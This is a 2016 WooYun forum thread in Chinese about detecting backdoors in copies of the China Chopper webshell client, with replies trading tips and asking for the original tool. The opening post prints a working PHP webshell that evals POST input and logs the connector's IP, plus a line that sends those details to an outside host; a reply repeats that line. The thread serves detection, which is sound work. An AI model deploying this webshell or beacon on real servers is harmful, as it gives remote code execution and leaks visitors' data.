关于菜刀后门排查

  • A+
所属分类:WooYun-Zone

最近菜刀后门被爆出来后  大家都在寻找没有后门的菜刀

可是…  

人家说没后门  你却不知道是否真的没有后门(除非自己抓下包或者反编译看看)

自己先初步排查  如抓包:

http://www.myhack58.com/Article/html/3/8/2015/66935.htm

习科 虾米大牛的

http://tieba.baidu.com/p/3187132003

去年的时候菜刀后门事件被爆 可没有现在那么火热

我也在挺早的时间查了一下自己的菜刀  确实有发现请求,不过现在去掉了

可是…  记得前段时间看到一篇文章 连上菜刀不发包  但是你做操作的时候才发包 这个也有遇到过..

于是… 还是被爆菊

我和大家分享一下我是如何发现菜刀是否存在后门的

我稍微修改了一句话木马  从而使他连接会记录连接者的IP

代码:

<?php

  header("Content-type:text/html;charset=utf-8");

if(!empty($_POST['t'])){

  $t = fopen("1.txt","a+");

  fwrite($t,"Hakcer IP: ".@$_SERVER['REMOTE_ADDR']." Hacker Name: ".@$_SERVER['REMOTE_HOST']." Hacker Prot: ".@$_SERVER['REMOTE_PORT']."\r\n");

  eval($_POST['t']);

}

?>

1.txt 是在马的目录下的   各位可自行修改为远程发送

file_get_contents("http://www.t0n9.com/1.php?i=".@$_SERVER['REMOTE_ADDR']."&n=".@$_SERVER['REMOTE_HOST']."&p="@$_SERVER['REMOTE_PORT']);

这个有点守株待兔的感觉

到现在为止我博客的一句话都没有人连…

关于菜刀后门排查

抛砖引玉,希望各位共享一下自己排查后门的方法与姿势!

  1. 1#

    小牛牛 | 2016-03-08 15:05

    可以的

  2. 2#

    小哲哥 | 2016-03-08 15:21

    666

  3. 3#

    M4ster (KnownSec && 404 Team) | 2016-03-08 16:24

    鉴于可能会检测是否有开启抓包工具,可以镜像流量至其他电脑。

  4. 4#

    这只猪 (核心白帽♀)该用户乌云好评累计:★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★☆☆ () | 2016-03-08 16:28

    6666666666666666
    求无后门的菜刀,话说以前社区某位大牛发的  “板斧”“Hatchet”  这个有后门吗? 加的变异UPX我竟然没脱掉。。。
    @俺是农村的

  5. 5#

    ansec (青春因梦想而精彩!) | 2016-03-08 16:46

    用流量统计,运气好,还能找到来路呢。

  6. 6#
    感谢(1)

    我叫金挖挖 | 2016-03-08 17:16

    用原版菜刀不就行了。。

  7. 7#

    班尼路 (生活如此美丽,快乐一望无际!) | 2016-03-08 17:51

    @我叫金挖挖 求原版菜刀 最新的是2014年的吧

  8. 8#

    我叫金挖挖 | 2016-03-08 18:21

    @班尼路 邮箱

  9. 9#

    班尼路 (生活如此美丽,快乐一望无际!) | 2016-03-08 18:26

  10. 10#

    pr0mise | 2016-03-08 19:13

    @这只猪 我记得农村牛把hatchet开源了啊

  11. 11#

    kissrain | 2016-03-08 19:43

    @我叫金挖挖 大神能不能也给我一个,好人有好报,祝你身体健康,万事如意,财源滚滚~~  [email protected]

  12. 12#

    我叫金挖挖 | 2016-03-08 19:50

    @kissrain 这尼玛发不出去。。。我去试试网盘

  13. 13#

    我叫金挖挖 | 2016-03-08 19:51

    @kissrain 收到回复

  14. 14#

    kissrain | 2016-03-08 20:00

    @我叫金挖挖 谢谢!!!!!!!!!!!!   大神我爱你!!!!!!!!

  15. 15#

    班尼路 (生活如此美丽,快乐一望无际!) | 2016-03-08 20:08

    @我叫金挖挖 网盘分享哇

  16. 16#

    冰封的心 | 2016-03-08 20:14

    @M4ster 请教一下镜像流量的详细方法 本人菜鸟没搞过 我QQ595377628 谢谢

  17. 17#

    这只猪 (核心白帽♀)该用户乌云好评累计:★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★☆☆ () | 2016-03-08 20:20

    @我叫金挖挖 同求原版菜刀   [email protected]

  18. 18#

    我叫金挖挖 | 2016-03-08 20:47

    @班尼路 网盘不让分享危险文件。。

  19. 19#

    我叫金挖挖 | 2016-03-08 20:48

    @这只猪 如果激动,轻点感谢

  20. 20#

    园长 (喵~) | 2016-03-08 22:18

    玩意人家用的是Socket或者DNS请求呢?抓HTTP包显然是不够的?

  21. 21#

    班尼路 (生活如此美丽,快乐一望无际!) | 2016-03-08 22:26

    @园长园长分享个2014年原版菜刀

  22. 22#

    0223 (单纯大型工具党) | 2016-03-08 22:27

    @园长 +1

  23. 23#

    小杰哥 (能学则学,技多不压身。) | 2016-03-08 23:18

    @园长 对啊!  所以抛砖引玉  希望园长等各位大神丢点姿势!  :)

  24. 24#

    Jumbo (www.chinabaiker.com) | 2016-03-08 23:44

    代码收了XD

  25. 25#

    小杰哥 (能学则学,技多不压身。) | 2016-03-09 15:44

    大家在共享几个姿势呗~

  26. 26#

    这只猪 (核心白帽♀)该用户乌云好评累计:★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★☆☆ () | 2016-03-09 16:08

    @园长 园长来一发

  27. 27#

    | 2016-03-09 16:18

    大家的头像都挺屌的

  28. 28#

    r3d0x8 (‘ and ’1′=’2”) | 2016-03-09 16:21

    别人进去就可以把文件删了。。。。。。。。

  29. 29#

    beastk | 2016-03-10 19:25

    小杰哥真是666666666666666666666666666666666666666666666666666,晚上我悄悄告诉你另一个姿势

  30. 30#

    小杰哥 (能学则学,技多不压身。) | 2016-03-10 21:13

    @r3d0x8  远程写入 file_get_contents(“http://www.t0n9.com/1.php?i=”.@$_SERVER['REMOTE_ADDR'].”&n=”.@$_SERVER['REMOTE_HOST'].”&p=”@$_SERVER['REMOTE_PORT']);

  31. 31#

    Marsevil (ฏ๎๎๎๎๎๎๎๎๎ฏ๎๎๎๎๎๎ด้้้้้็็) | 2016-03-15 09:40

    一直用的原版菜刀,原版菜刀好像至今还没被发现有后门,毕竟那么多人盯着的。验证下md5值就知道是不是原版菜刀了

  32. 32#

    小牛牛 | 2016-04-11 11:04

    @Marsevil 可以给个原版菜刀不

  33. 33#

    MR林 | 2016-05-23 23:56

    官网的应该没有吧